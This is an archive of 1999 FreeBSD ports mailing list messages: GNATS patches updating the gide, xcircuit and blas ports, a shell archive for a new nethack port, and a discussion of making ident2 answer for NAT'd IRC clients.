cp -p extra/* $(distdir)/extra # Tell versions [3.59,3.63) of GNU make to not export all variables. diff -urN /usr/ports/devel/gide/patches/patch-aj devel/gide/patches/patch-aj --- /usr/ports/devel/gide/patches/patch-aj Thu Oct 21 14:49:46 1999 +++ devel/gide/patches/patch-aj Thu Jan 1 09:00:00 1970 @@ -1,13 +0,0 @@ ---- src/gI_document.c.orig Mon Oct 18 19:48:54 1999 -+++ src/gI_document.c Mon Oct 18 19:56:06 1999 -@@ -41,8 +41,8 @@ - #include "gI_menus.h" - - #ifdef HAVE_GTKTEXT_PATCH --#include --#include -+#include "GtkSCText/gtksctext.h" -+#include "GtkEditor/gtkeditor/gtkeditor.h" - #endif - - /* externs */ diff -urN /usr/ports/devel/gide/patches/patch-ak devel/gide/patches/patch-ak --- /usr/ports/devel/gide/patches/patch-ak Thu Oct 21 14:49:46 1999 +++ devel/gide/patches/patch-ak Thu Jan 1 09:00:00 1970 @@ -1,13 +0,0 @@ ---- src/gI_file.c.orig Mon Oct 18 19:48:54 1999 -+++ src/gI_file.c Mon Oct 18 19:57:47 1999 -@@ -38,8 +38,8 @@ - #include "gI_project.h" - - #ifdef HAVE_GTKTEXT_PATCH --#include --#include -+#include "GtkSCText/gtksctext.h" -+#include "GtkEditor/gtkeditor/gtkeditor.h" - #include "gI_globpatterns.h" - #endif - diff -urN /usr/ports/devel/gide/patches/patch-al devel/gide/patches/patch-al --- /usr/ports/devel/gide/patches/patch-al Thu Oct 21 14:49:46 1999 +++ devel/gide/patches/patch-al Thu Jan 1 09:00:00 1970 @@ -1,11 +0,0 @@ ---- src/gI_globpatterns.h.orig Thu Jul 1 04:11:42 1999 -+++ src/gI_globpatterns.h Mon Oct 18 19:58:28 1999 -@@ -21,7 +21,7 @@ - #ifndef GLOB_PATTERNS_H - #define GLOB_PATTERNS_H - --#include -+#include "GtkEditor/gtkeditor/gtkeditor.h" - #include "gI_hilite.h" - - /* gI_globpatterns -- used for associating filenames with highlight diff -urN /usr/ports/devel/gide/patches/patch-am devel/gide/patches/patch-am --- /usr/ports/devel/gide/patches/patch-am Thu Oct 21 14:49:46 1999 +++ devel/gide/patches/patch-am Thu Jan 1 09:00:00 1970 @@ -1,11 +0,0 @@ ---- src/gI_guilesupport.c.orig Mon Oct 18 20:23:57 1999 -+++ src/gI_guilesupport.c Mon Oct 18 21:12:27 1999 -@@ -20,7 +20,7 @@ - #ifdef HAVE_LIBGUILE - - #include --#include -+#include "GtkEditor/gtkeditor/gtkeditor.h" - - #include - #include diff -urN /usr/ports/devel/gide/patches/patch-an devel/gide/patches/patch-an --- /usr/ports/devel/gide/patches/patch-an Thu Oct 21 14:49:46 1999 +++ devel/gide/patches/patch-an Thu Jan 1 09:00:00 1970 @@ -1,11 +0,0 @@ ---- src/gI_hilite.c.orig Mon Oct 18 19:48:54 1999 -+++ src/gI_hilite.c Mon Oct 18 19:59:13 1999 -@@ -21,7 +21,7 @@ - - #include - #include --#include -+#include "GtkEditor/gtkeditor/gtkeditor.h" - - #include - #include diff -urN /usr/ports/devel/gide/patches/patch-ao devel/gide/patches/patch-ao --- /usr/ports/devel/gide/patches/patch-ao Thu Oct 21 14:49:47 1999 +++ devel/gide/patches/patch-ao Thu Jan 1 09:00:00 1970 @@ -1,11 +0,0 @@ ---- src/gI_hilite.h.orig Mon Jul 5 00:58:27 1999 -+++ src/gI_hilite.h Mon Oct 18 19:59:58 1999 -@@ -24,7 +24,7 @@ - - #include - #include --#include -+#include "GtkEditor/gtkeditor/gtkeditor.h" - - typedef struct _gI_HilitePattern gI_HilitePattern; - struct _gI_HilitePattern diff -urN /usr/ports/devel/gide/patches/patch-ap devel/gide/patches/patch-ap --- /usr/ports/devel/gide/patches/patch-ap Thu Oct 21 14:49:47 1999 +++ devel/gide/patches/patch-ap Thu Jan 1 09:00:00 1970 @@ -1,11 +0,0 @@ ---- src/gI_prefs.c.orig Mon Oct 18 20:23:57 1999 -+++ src/gI_prefs.c Mon Oct 18 20:58:04 1999 -@@ -39,7 +39,7 @@ - #endif - - #ifdef HAVE_GTKTEXT_PATCH --#include -+#include "GtkSCText/gtksctext.h" - #include "gI_hilite.h" - #endif - diff -urN /usr/ports/devel/gide/patches/patch-aq devel/gide/patches/patch-aq --- /usr/ports/devel/gide/patches/patch-aq Thu Oct 21 14:49:47 1999 +++ devel/gide/patches/patch-aq Thu Jan 1 09:00:00 1970 @@ -1,11 +0,0 @@ ---- src/gI_search.c.orig Mon Oct 18 20:23:58 1999 -+++ src/gI_search.c Mon Oct 18 21:03:23 1999 -@@ -32,7 +32,7 @@ - #include "regex.h" - #endif - #ifdef HAVE_GTKTEXT_PATCH --#include -+#include "GtkSCText/gtksctext.h" - #endif - - #include "structs.h" diff -urN /usr/ports/devel/gide/patches/patch-as devel/gide/patches/patch-as --- /usr/ports/devel/gide/patches/patch-as Thu Oct 21 14:49:48 1999 +++ devel/gide/patches/patch-as Thu Jan 1 09:00:00 1970 @@ -1,11 +0,0 @@ ---- src/structs.h.orig Mon Jul 5 00:58:27 1999 -+++ src/structs.h Mon Oct 18 20:00:32 1999 -@@ -26,7 +26,7 @@ - /* Structs for gIDE */ - - #ifdef HAVE_GTKTEXT_PATCH --#include -+#include "GtkEditor/gtkeditor/gtkeditor.h" - #endif - - /* defines */ diff -urN /usr/ports/devel/gide/patches/patch-at devel/gide/patches/patch-at --- /usr/ports/devel/gide/patches/patch-at Thu Oct 21 14:49:48 1999 +++ devel/gide/patches/patch-at Thu Jan 1 09:00:00 1970 @@ -1,11 +0,0 @@ ---- src/GtkEditor/gtkeditor/gtkeditor.h.orig Fri Jun 4 15:53:30 1999 -+++ src/GtkEditor/gtkeditor/gtkeditor.h Mon Oct 18 20:42:55 1999 -@@ -23,7 +23,7 @@ - #define __GTK_EDITOR_H__ - - #include --#include -+#include "../../GtkSCText/gtksctext.h" - - - #ifdef __cplusplus diff -urN /usr/ports/devel/gide/patches/patch-au devel/gide/patches/patch-au --- /usr/ports/devel/gide/patches/patch-au Thu Jan 1 09:00:00 1970 +++ devel/gide/patches/patch-au Sun Dec 12 15:12:00 1999 @@ -0,0 +1,14 @@ +--- src/Makefile.in.orig Tue Dec 7 04:43:34 1999 ++++ src/Makefile.in Sun Dec 12 15:11:42 1999 +@@ -279,9 +279,9 @@ + + maintainer-clean-libtool: + +-gide: $(gide_OBJECTS) $(gide_DEPENDENCIES) ++gide: $(gide_OBJECTS) $(gide_DEPENDENCIES) $(LIBOBJS) + @rm -f gide +- $(LINK) $(gide_LDFLAGS) $(gide_OBJECTS) $(gide_LDADD) $(LIBS) ++ $(LINK) $(gide_LDFLAGS) $(gide_OBJECTS) $(LIBOBJS) $(gide_LDADD) $(LIBS) + + gdbio: $(gdbio_OBJECTS) $(gdbio_DEPENDENCIES) + @rm -f gdbio diff -urN /usr/ports/devel/gide/patches/patch-av devel/gide/patches/patch-av --- /usr/ports/devel/gide/patches/patch-av Thu Jan 1 09:00:00 1970 +++ devel/gide/patches/patch-av Sun Dec 12 14:14:21 1999 @@ -0,0 +1,11 @@ +--- src/GtkEditor/gtkeditor/Makefile.in.orig Tue Dec 7 04:43:34 1999 ++++ src/GtkEditor/gtkeditor/Makefile.in Sun Dec 12 14:14:12 1999 +@@ -122,7 +122,7 @@ + l = @l@ + + # include ../regex 'cause we haven't installed it yet +-INCLUDES= -I$(srcdir)/../../GtkSCText ++INCLUDES= -I$(srcdir)/../../GtkSCText -I$(srcdir)/../.. + + noinst_LIBRARIES = libgtkeditor.a + diff -urN /usr/ports/devel/gide/pkg/PLIST devel/gide/pkg/PLIST --- /usr/ports/devel/gide/pkg/PLIST Fri Nov 19 08:13:06 1999 +++ devel/gide/pkg/PLIST Sun Dec 12 15:42:23 1999 @@ -1,29 +1,20 @@ bin/gdbio bin/gide +include/gtkeditor.h +include/gtkhint.h include/gtksctext.h -include/gtkeditor/gtkeditor.h -include/gtkeditor/gtkhint.h -include/regex.h -lib/libgtkeditor.a -lib/libgtkeditor.so -lib/libgtkeditor.so.0 -lib/libgtksctext.a -lib/libgtksctext.so -lib/libgtksctext.so.0 -lib/libregex.a -lib/libregex.so -lib/libregex.so.0 @exec /usr/bin/env OBJFORMAT=%%PORTOBJFORMAT%% /sbin/ldconfig -m %B @unexec /usr/bin/env OBJFORMAT=%%PORTOBJFORMAT%% /sbin/ldconfig -R share/gnome/gIDE/extra/README share/gnome/gIDE/extra/compile_sets share/gnome/gIDE/extra/functions.highlight share/gnome/gIDE/extra/functions.ignore +share/gnome/gIDE/extra/gide.conf share/gnome/gIDE/extra/gide.scm share/gnome/gIDE/extra/glob share/gnome/gIDE/extra/glob.scm share/gnome/gIDE/extra/patterns share/gnome/gIDE/extra/patterns.scm +share/locale/fr/LC_MESSAGES/gIDE.mo @dirrm share/gnome/gIDE/extra @dirrm share/gnome/gIDE -@dirrm include/gtkeditor >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Mon Dec 13 12:20:24 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 097DA151D0 for ; Mon, 13 Dec 1999 12:20:07 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id MAA20083; Mon, 13 Dec 1999 12:20:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: by hub.freebsd.org (Postfix, from userid 32767) id 31FD7151E8; Mon, 13 Dec 1999 12:12:37 -0800 (PST) Message-Id: <19991213201237.31FD7151E8@hub.freebsd.org> Date: Mon, 13 Dec 1999 12:12:37 -0800 (PST) From: tkato@prontomail.ne.jp To: freebsd-gnats-submit@freebsd.org X-Send-Pr-Version: www-1.0 Subject: ports/15465: Update port: cad/xcircuit to 2.0b1 Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 15465 >Category: ports >Synopsis: Update port: cad/xcircuit to 2.0b1 >Confidential: no >Severity: non-critical >Priority: low >Responsible: freebsd-ports >State: open >Quarter: >Keywords: >Date-Required: >Class: change-request >Submitter-Id: current-users >Arrival-Date: Mon Dec 13 12:20:01 PST 1999 >Closed-Date: >Last-Modified: >Originator: KATO Tsuguru >Release: 3.3-RELEASE i386 >Organization: >Environment: >Description: * Updated version 2.0a11 to 2.0b1 * Added secondary site to MASTER_SITES >How-To-Repeat: >Fix: diff -urN /usr/ports/cad/xcircuit/Makefile cad/xcircuit/Makefile --- /usr/ports/cad/xcircuit/Makefile Thu Nov 25 20:12:36 1999 +++ cad/xcircuit/Makefile Tue Dec 14 02:48:37 1999 @@ -1,14 +1,15 @@ # New ports collection makefile for: xcircuit -# Version required: 2.0a11 +# Version required: 2.0b1 # Date created: 3 Apr 1998 # Whom: giffunip@asme.org # # $FreeBSD: ports/cad/xcircuit/Makefile,v 1.11 1999/11/25 08:31:51 jkoshy Exp $ # -DISTNAME= xcircuit-2.0a11 +DISTNAME= xcircuit-2.0b1 CATEGORIES= cad -MASTER_SITES= ftp://bach.ece.jhu.edu/pub/tim/xcircuit/ +MASTER_SITES= ftp://bach.ece.jhu.edu/pub/tim/xcircuit/ \ + http://bach.ece.jhu.edu/~tim/programs/xcircuit/archive/ MAINTAINER= ports@FreeBSD.org diff -urN /usr/ports/cad/xcircuit/files/md5 cad/xcircuit/files/md5 --- /usr/ports/cad/xcircuit/files/md5 Thu Nov 25 20:12:36 1999 +++ cad/xcircuit/files/md5 Tue Dec 14 02:29:41 1999 @@ -1 +1 @@ -MD5 (xcircuit-2.0a11.tar.bz2) = 89e19e56d9b61a520c90cd2878b27d68 +MD5 (xcircuit-2.0b1.tar.bz2) = e3cd348d7221891dc693fe5cae3d6d0d diff -urN /usr/ports/cad/xcircuit/patches/patch-aa cad/xcircuit/patches/patch-aa --- /usr/ports/cad/xcircuit/patches/patch-aa Wed Oct 27 19:13:05 1999 +++ cad/xcircuit/patches/patch-aa Tue Dec 14 04:46:15 1999 @@ -1,23 +1,60 @@ -*** Imakefile.orig Tue Oct 26 22:43:27 1999 ---- Imakefile Wed Oct 27 04:11:29 1999 +*** Imakefile.orig Thu Nov 25 07:05:35 1999 +--- Imakefile Tue Dec 14 04:46:02 1999 *************** -*** 31,39 **** +*** 24,40 **** + #CCOPTIONS = -O2 + # + # for debugging purposes uncomment the following line: +! CDEBUGFLAGS = -g +! STD_INCLUDES = -I. -I/usr/X11R6/include/X11 + + #------------------------------------------------------------------------ + # Installation directories: # Change the following as desired to suit your environment: #------------------------------------------------------------------------ # ! PREFIX = /usr/local - # XCIRCUIT_LIB_DIR = $(PREFIX)/src/xcircuit-2.0a11/psfiles + # XCIRCUIT_LIB_DIR = $(PREFIX)/src/xcircuit-2.0b1/psfiles ! XCIRCUIT_LIB_DIR = $(PREFIX)/lib/xcircuit-2.0 XCIRCUIT_BIN_DIR = $(PREFIX)/bin XCIRCUIT_MAN_DIR = $(PREFIX)/man/man1 ---- 31,39 ---- +--- 24,40 ---- + #CCOPTIONS = -O2 + # + # for debugging purposes uncomment the following line: +! #CDEBUGFLAGS = -g +! #STD_INCLUDES = -I. -I/usr/X11R6/include/X11 + + #------------------------------------------------------------------------ + # Installation directories: # Change the following as desired to suit your environment: #------------------------------------------------------------------------ # ! PREFIX ?= /usr/local - # XCIRCUIT_LIB_DIR = $(PREFIX)/src/xcircuit-2.0a11/psfiles + # XCIRCUIT_LIB_DIR = $(PREFIX)/src/xcircuit-2.0b1/psfiles ! XCIRCUIT_LIB_DIR = $(PREFIX)/lib/X11/xcircuit XCIRCUIT_BIN_DIR = $(PREFIX)/bin XCIRCUIT_MAN_DIR = $(PREFIX)/man/man1 +*************** +*** 87,95 **** + # DEC Alpha, Solaris and other SVR4 systems need the following, + # or if you have compilation errors about "dp->d_name" being + # undefined: +! #DIRENT = -DSVR4_DIRENT + # Otherwise, +! DIRENT = + + # My DECstation (Ultrix) has something funny going on in XLib. . . if there + # is a compile-time error "ld: Undefined: XUniqueContext *** Error code 1" +--- 87,95 ---- + # DEC Alpha, Solaris and other SVR4 systems need the following, + # or if you have compilation errors about "dp->d_name" being + # undefined: +! DIRENT = -DSVR4_DIRENT + # Otherwise, +! #DIRENT = + + # My DECstation (Ultrix) has something funny going on in XLib. . . if there + # is a compile-time error "ld: Undefined: XUniqueContext *** Error code 1" diff -urN /usr/ports/cad/xcircuit/pkg/PLIST cad/xcircuit/pkg/PLIST --- /usr/ports/cad/xcircuit/pkg/PLIST Sun Sep 26 07:13:39 1999 +++ cad/xcircuit/pkg/PLIST Tue Dec 14 03:03:06 1999 @@ -1,6 +1,5 @@ bin/xcircuit lib/X11/app-defaults/XCircuit -lib/X11/app-defaults/XSchema lib/X11/xcircuit/analog.lps lib/X11/xcircuit/avlsi.lps lib/X11/xcircuit/builtins.lps @@ -35,11 +34,13 @@ lib/X11/xcircuit/signal.lps lib/X11/xcircuit/xcircps2.pro share/examples/xcircuit/USAflag.ps +share/examples/xcircuit/analog1.ps +share/examples/xcircuit/analog2.ps +share/examples/xcircuit/analoglib.lps share/examples/xcircuit/border.ps share/examples/xcircuit/logic8.ps share/examples/xcircuit/prelude.ps share/examples/xcircuit/systemd1.lgf -share/examples/xcircuit/test.ps share/examples/xcircuit/threestage.ps share/examples/xcircuit/vcoblock.ps @dirrm share/examples/xcircuit >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Mon Dec 13 12:20:25 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 9F82115170 for ; Mon, 13 Dec 1999 12:20:09 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id MAA20118; Mon, 13 Dec 1999 12:20:09 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: by hub.freebsd.org (Postfix, from userid 32767) id AC2D81519D; Mon, 13 Dec 1999 12:18:22 -0800 (PST) Message-Id: <19991213201822.AC2D81519D@hub.freebsd.org> Date: Mon, 13 Dec 1999 12:18:22 -0800 (PST) From: tkato@prontomail.ne.jp To: freebsd-gnats-submit@freebsd.org X-Send-Pr-Version: www-1.0 Subject: ports/15468: Update port: math/blas Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 15468 >Category: ports >Synopsis: Update port: math/blas >Confidential: no >Severity: non-critical >Priority: low >Responsible: freebsd-ports >State: open >Quarter: >Keywords: >Date-Required: >Class: change-request >Submitter-Id: current-users >Arrival-Date: Mon Dec 13 12:20:03 PST 1999 >Closed-Date: >Last-Modified: >Originator: KATO Tsuguru >Release: 3.3-RELEASE i386 >Organization: >Environment: >Description: * Fixed MASTER_SITES * Supported NO_WRKSUBDIR * Added WWW: line into pkg/DESCR Remove file: scripts/uncomp >How-To-Repeat: >Fix: diff -urN /usr/ports/math/blas/Makefile math/blas/Makefile --- /usr/ports/math/blas/Makefile Wed Aug 25 19:19:30 1999 +++ math/blas/Makefile Tue Dec 14 03:50:27 1999 @@ -11,20 +11,20 @@ CATEGORIES= math MASTER_SITES= ftp://netlib.bell-labs.com/netlib/blas/ \ ftp://www.hensa.ac.uk/mirrors/netlib/blas/ \ - ftp://elib.zib-berlin.de/pub/blas/ + http://www.netlib.org/blas/ EXTRACT_SUFX= .tgz MAINTAINER= ports@FreeBSD.org -WRKSRC= ${WRKDIR} +NO_WRKSUBDIR= yes .include pre-build: - ${CP} ${FILESDIR}/makefile.lib ${WRKDIR}/Makefile + ${CP} ${FILESDIR}/makefile.lib ${WRKSRC}/Makefile post-install: - ${LDCONFIG} -m ${PREFIX}/lib + ${SETENV} OBJFORMAT=${PORTOBJFORMAT} ${LDCONFIG} -m ${PREFIX}/lib .if ${PORTOBJFORMAT} == "aout" ${LN} -sf libblas.so.1.0 ${PREFIX}/lib/libblas.so .endif diff -urN /usr/ports/math/blas/pkg/DESCR math/blas/pkg/DESCR --- /usr/ports/math/blas/pkg/DESCR Tue Feb 10 08:33:30 1998 +++ math/blas/pkg/DESCR Tue Dec 14 03:43:31 1999 @@ -8,3 +8,5 @@ A Fortran77 reference implementation of the BLAS is located in the blas directory of Netlib. + +WWW: http://www.netlib.org/blas/ diff -urN /usr/ports/math/blas/scripts/uncomp math/blas/scripts/uncomp --- /usr/ports/math/blas/scripts/uncomp Tue Feb 10 08:33:30 1998 +++ math/blas/scripts/uncomp Thu Jan 1 09:00:00 1970 @@ -1,6 +0,0 @@ -#!/bin/sh -outdir=$1 -infile=$2 -outfile=`basename $infile .gz` -echo Uncompressing $infile to $outdir/$outfile -zcat $infile > $outdir/$outfile >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Mon Dec 13 12:23:46 1999 Delivered-To: freebsd-ports@freebsd.org Received: from dnvrpop1.dnvr.uswest.net (dnvrpop1.dnvr.uswest.net [206.196.128.3]) by hub.freebsd.org (Postfix) with SMTP id B3229151AC for ; Mon, 13 Dec 1999 12:23:42 -0800 (PST) (envelope-from Davec@unforgettable.com) Received: (qmail 7057 invoked by alias); 13 Dec 1999 20:23:40 -0000 Delivered-To: fixup-freebsd-ports@freebsd.org@fixme Received: (qmail 7043 invoked by uid 0); 13 Dec 1999 20:23:40 -0000 Received: from odsl228.dnvr.uswest.net (HELO Amber.XtremeDev.com) (209.181.79.228) by dnvrpop1.dnvr.uswest.net with SMTP; 13 Dec 1999 20:23:40 -0000 From: Davec Reply-To: Davec@unforgettable.com To: freebsd-ports@freebsd.org, freebsd-stable@freebsd.org, ipfilter@coombs.anu.edu.au Subject: Re: pidentd Date: Mon, 13 Dec 1999 13:22:47 -0700 X-Mailer: KMail [version 1.0.28] Content-Type: text/plain References: <7101.991211@Home.Com> <3.0.6.32.19991212141700.007e2ac0@netcore.home> In-Reply-To: <3.0.6.32.19991212141700.007e2ac0@netcore.home> MIME-Version: 1.0 Message-Id: <99121216534200.40553@Amber.XtremeDev.com> Content-Transfer-Encoding: 8bit Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Sun, 12 Dec 1999, Pekka Savola wrote: > Hi, > > I encountered the similar problem myself - and asked around for solutions. > I have come to the conclusion that there are _no_ identd implementations > for FreeBSD that would support NAT/Masq'ed connections. There are plenty > of them for Linux, but they seem to use proc filesystem and are of no use.. > > Pidentd doesn't support masqed connections. There is patch for it to do > that, but it is Linux only > (http://www.manpages.org/pidentd/pidentd+fm-1.1.patch.gz). > > Midentd and Oidentd support masqed connections in Linux, but not in *BSD. > There are more like these, just check e.g. freshmeat. > > Ident2 doesn't seem to do masqed connections at all > (http://www.nyct.net/~defile/programs/ident2/). > > Cidentd doesn't seem to have been updated since 1996, and there is a nasty > buffer overflow in it. > > Regards, > > Pekka Savola pekkas@netcore.fi > --- Hello, my setup is as follows: FreeBSD server running IPFIlter/IPNat on DSL for my Win98SE workstation. Now, I've modified ident2 server (very very slight, one line only) to answer for all ident requests, including nat'd connections. If I irc from FreeBSD, ident2 would give the irc server whatever ident I choose (.ident file in my home dir) or my real user name, as it should be doing. But if I irc from the Win98 machine ident2 would give a random ident reply. That was the best I could do right now, as I still don't know (YET) how to get ident2 to query IPNat for the current mappings (ipnat -l shows all current table mappings, and I can theoretically parse through that list to match the port numbers sent by the irc server), and then turn around and have ident2 query the mIRC or Xircon client for ident requests to send back to the irc server. Hopefully someone with more knowledge of IPNat or ipfw programming could give some pointers. Theoretically the events that happen should be: 1. Irc server sends request (of form 6666, 5125) to FreeBSD ident2 2. ident2 checks user and sees that no one is irc'ing from the FreeBSD box. 3. ident2 then checks IPNat's table mappings to match any current ports requested by the irc server (don't know how safe this step is...) 4. If it finds the port ident2 would send out a request of it's own to 113 ip of the mapped ports and query for an ident response. 5. mIRC or whatever irc client is running on the Windows box would reply to the ident request. 6. ident2 would take that reply and bounce it to the irc server on the outside. Hopefully this is understandable. Right now I can get the mapping (system("ipnat -l")) and parse it (if I run ident2 as root user and keep it from dropping to a lesser id), but it's all very insecure. And I'm hoping a better way of interfacing with IPNat, and might work something out when I have more time on my hands. This is all preliminary and I don't even know if this would work or not, just thought I'd toss in my 2 cents and get feedback/help. Please, if this is just a lame brained idea that you know for certain won't work, don't hesitate to let me know. d:) Otherwise I would be wasting mine and everyone else's time. Davec P.S. Oh, and let me know if anyone wants the modified ident2, I have it shar'd as a port, with the added patch. And yes, one of these days I will remember to contact the author to let him know how I've mangled his program... -- Davec@unforgettable.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Mon Dec 13 12:30:17 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id EB86F1514F for ; Mon, 13 Dec 1999 12:30:02 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id MAA20962; Mon, 13 Dec 1999 12:30:02 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: from ckmso1.proxy.att.com (ckmso1.att.com [12.20.58.69]) by hub.freebsd.org (Postfix) with ESMTP id 28219153A9 for ; Mon, 13 Dec 1999 12:21:56 -0800 (PST) (envelope-from dms@rally3.jazz.att.com) Received: from rally3.jazz.att.com ([135.91.18.87]) by ckmso1.proxy.att.com (AT&T IPNS/MSO-2.2) with ESMTP id PAA24146 for ; Mon, 13 Dec 1999 15:21:50 -0500 (EST) Received: (from root@localhost) by rally3.jazz.att.com (8.9.3/8.9.3) id PAA24626; Mon, 13 Dec 1999 15:19:30 GMT (envelope-from dms) Message-Id: <199912131519.PAA24626@rally3.jazz.att.com> Date: Mon, 13 Dec 1999 15:19:30 GMT From: dscheidt@enteract.com Reply-To: dscheidt@enteract.com To: FreeBSD-gnats-submit@freebsd.org X-Send-Pr-Version: 3.2 Subject: ports/15469: New port: nethack-3.3.0 Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 15469 >Category: ports >Synopsis: New port: nethack-3.3.0 >Confidential: no >Severity: non-critical >Priority: medium >Responsible: freebsd-ports >State: open >Quarter: >Keywords: >Date-Required: >Class: change-request >Submitter-Id: current-users >Arrival-Date: Mon Dec 13 12:30:01 PST 1999 >Closed-Date: >Last-Modified: >Originator: David Scheidt >Release: FreeBSD 4.0-CURRENT i386 >Organization: >Environment: >Description: >How-To-Repeat: >Fix: # This is a shell archive. Save it in a file, remove anything before # this line, and then unpack it by entering "sh file". Note, it may # create directories; files and directories will be owned by you and # have default permissions. # # This archive contains: # # . # ./Makefile # ./patches # ./patches/patch-ae # ./patches/patch-ad # ./patches/patch-ac # ./patches/patch-ab # ./patches/patch-aa # ./patches/patch-af # ./files # ./files/md5 # ./pkg # ./pkg/PLIST # ./pkg/COMMENT # ./pkg/DESCR # echo c - . mkdir -p . > /dev/null 2>&1 echo x - ./Makefile sed 's/^X//' >./Makefile << 'END-of-./Makefile' X# New ports collection makefile for: nethack X# Version required: 3.3.0 X# Date created: 12 December 1999 X# Whom: dscheidt@enteract.com X# X XDISTNAME= nethack-3.3.0 XCATEGORIES= games X#MASTER_SITES= ftp://ftp.wtower.com/nethack/sources/ \ X# ${MASTER_SITE_GNU} XMASTER_SITES= ftp://ftp.nethack.org/pub/nethack/src/ \ X ${MASTER_SITE_GNU} XMASTER_SITE_SUBDIR= nethack X XMAINTAINER= dscheidt@enteract.com X XLIB_DEPENDS= Xpm.4:${PORTSDIR}/graphics/xpm X XUSE_GMAKE= yes X X#MANDIR= ${PREFIX}/man/man X#MAN6= dgn_comp.6 dlb.6 lev_comp.6 nethack.6 recover.6 X Xpre-configure: X @cd ${WRKSRC}/sys/unix; ${SH} setup.sh X Xpost-install: X @cd ${WRKSRC}/doc; ${CHMOD} 644 *.6 X @cd ${WRKSRC}/doc; PREFIX=${PREFIX} ${MAKE} manpages X.if !defined(NOPORTDOCS) X ${MKDIR} ${PREFIX}/share/doc/nethack X ${CP} ${WRKSRC}/doc/Guidebook.txt ${PREFIX}/share/doc/nethack X.endif X X.include END-of-./Makefile echo c - ./patches mkdir -p ./patches > /dev/null 2>&1 echo x - ./patches/patch-ae sed 's/^X//' >./patches/patch-ae << 'END-of-./patches/patch-ae' X--- ./sys/unix/Makefile.top.orig Sat Dec 11 05:21:05 1999 X+++ ./sys/unix/Makefile.top Mon Dec 13 11:51:27 1999 X@@ -14,17 +14,16 @@ X # MAKE = make X X # make NetHack X-PREFIX = /usr X GAME = nethack X GAMEUID = games X-GAMEGRP = bin X+GAMEGRP = games X X # Permissions - some places use setgid instead of setuid, for instance X # See also the option "SECURE" in include/config.h X-GAMEPERM = 04755 X-FILEPERM = 0644 X+GAMEPERM = 02755 X+FILEPERM = 0664 X EXEPERM = 0755 X-DIRPERM = 0755 X+DIRPERM = 0775 X X # GAMEDIR also appears in config.h as "HACKDIR". X # X@@ -33,8 +32,8 @@ X # therefore there should not be anything in GAMEDIR that you want to keep X # (if there is, you'll have to do the installation by hand or modify the X # instructions) X-GAMEDIR = $(PREFIX)/games/lib/$(GAME)dir X-SHELLDIR = $(PREFIX)/games X+GAMEDIR = $(PREFIX)/share/$(GAME) X+SHELLDIR = $(PREFIX)/bin X X # per discussion in Install.X11 and Install.Qt X VARDATND = X@@ -184,9 +183,9 @@ X X install: $(GAME) $(VARDAT) dungeon spec_levs X # set up the directories X- -mkdir $(SHELLDIR) X+ -mkdir -p $(SHELLDIR) X -rm -rf $(GAMEDIR) X- -mkdir $(GAMEDIR) $(GAMEDIR)/save X+ -mkdir -p $(GAMEDIR) $(GAMEDIR)/save X -$(CHOWN) $(GAMEUID) $(GAMEDIR) $(GAMEDIR)/save X $(CHGRP) $(GAMEGRP) $(GAMEDIR) $(GAMEDIR)/save X chmod $(DIRPERM) $(GAMEDIR) $(GAMEDIR)/save END-of-./patches/patch-ae echo x - ./patches/patch-ad sed 's/^X//' >./patches/patch-ad << 'END-of-./patches/patch-ad' X--- ./sys/unix/Makefile.src.orig Sat Dec 11 00:21:05 1999 X+++ ./sys/unix/Makefile.src Sun Dec 12 20:27:50 1999 X@@ -132,8 +132,8 @@ X # flags for debugging: X # CFLAGS = -g -I../include X X-CFLAGS = -O -I../include X-LFLAGS = X+CFLAGS += -O -I../include -I${X11BASE}/include X+LFLAGS = -L${X11BASE}/lib X X # Only used for Qt interface (other interfaces are standard C) X CXXFLAGS = -g $(CFLAGS) -I. -I$(QTDIR)/include X@@ -165,8 +165,8 @@ X X # X # X-WINSRC = $(WINTTYSRC) X-WINOBJ = $(WINTTYOBJ) X+WINSRC = $(WINTTYSRC) $(WINX11SRC) X+WINOBJ = $(WINTTYOBJ) $(WINX11OBJ) X X # on some systems the termcap library is in -ltermcap or -lcurses X # on 386 Xenix, the -ltermlib tputs() seems not to work; use -lcurses instead X@@ -186,7 +186,7 @@ X # X # libraries for X11 X # If USE_XPM is defined in config.h, you will also need -lXpm here. X-WINX11LIB = -lXaw -lXmu -lXext -lXt -lX11 X+WINX11LIB = -lXaw -lXmu -lXext -lXt -lX11 -lXpm X # WINX11LIB = -lXaw -lXmu -lXt -lX11 X # WINX11LIB = -lXaw -lXmu -lXext -lXt -lXpm -lX11 -lm X # WINX11LIB = -lXaw -lXmu -lXpm -lXext -lXt -lX11 -lSM -lICE -lm 